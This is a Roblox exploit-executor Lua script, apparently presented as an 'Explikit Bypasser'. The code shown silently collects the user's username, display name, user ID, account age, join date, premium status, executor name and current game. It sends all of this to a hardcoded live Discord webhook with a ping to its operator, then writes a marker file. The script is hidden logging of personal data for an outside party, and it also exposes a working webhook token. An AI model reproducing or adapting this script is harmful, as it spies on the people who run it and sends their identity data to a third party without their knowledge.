local Webhook = "https://discord.com/api/webhooks/1214362214048473129/TZiBIqtyHY-VacUflBjohJrGgsXyPkcfiRVZVeX2O0d9FUbt2eKEQCPlHTtW8sEseIhN" -- webhook _G.Discord_UserID = "607988645567266922" -- ID To Ping local player = game:GetService"Players".LocalPlayer local joinTime = os.time() - (player.AccountAge*86400) local joinDate = os.date("!*t", joinTime) local premium = false local alt = true if player.MembershipType == Enum.MembershipType.Premium then premium = true end if not premium and player.AccountAge >= 70 then alt = "Possible" elseif premium and player.AccountAge >= 70 then alt = false end local executor = identifyexecutor() or "Unknown" local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId)) Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1] local AvatarImage = Thing.imageUrl local msg = { ["username"] = "Explikit Bypasser🔞", ["avatar_url"] = "https://cdn.discordapp.com/attachments/868496249958060102/901884186267365396/ezgif-2-3c2a2bc53af1.gif", ["content"] = ( _G.Discord_UserID ~= "" and _G.Discord_UserID ~= nil) and tostring("<@".._G.Discord_UserID..">") or " ", ["embeds"] = { { ["color"] = tonumber(tostring("0x32CD32")), --decimal ["title"] = "This Bozo Exekuted", ["thumbnail"] = { ["url"] = AvatarImage, }, ["fields"] = { { ["name"] = "Username", ["value"] = ""..player.Name.."", ["inline"] = true }, { ["name"] = "Display Name", ["value"] = player.DisplayName, ["inline"] = true }, { ["name"] = "UID", ["value"] = "["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")", ["inline"] = true }, { ["name"] = "Game Id", ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")", ["inline"] = true }, { ["name"] = "Game Name", ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name, ["inline"] = true }, { ["name"] = "Exploit Used ", ["value"] = executor, ["inline"] = true }, { ["name"] = "Alt", ["value"] = alt, ["inline"] = true }, { ["name"] = "Akkount Age", ["value"] = player.AccountAge.."day(s)", ["inline"] = true }, { ["name"] = "Date Joined", ["value"] = joinDate.month.."/"..joinDate.day.."/"..joinDate.year, ["inline"] = true }, }, ['timestamp'] = os.date("%Y-%m-%dT%X.000Z") } } } request = http_request or request or HttpPost or syn.request request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)}) makefolder("Workspace") writefile("Workspace/readthis.txt", "true")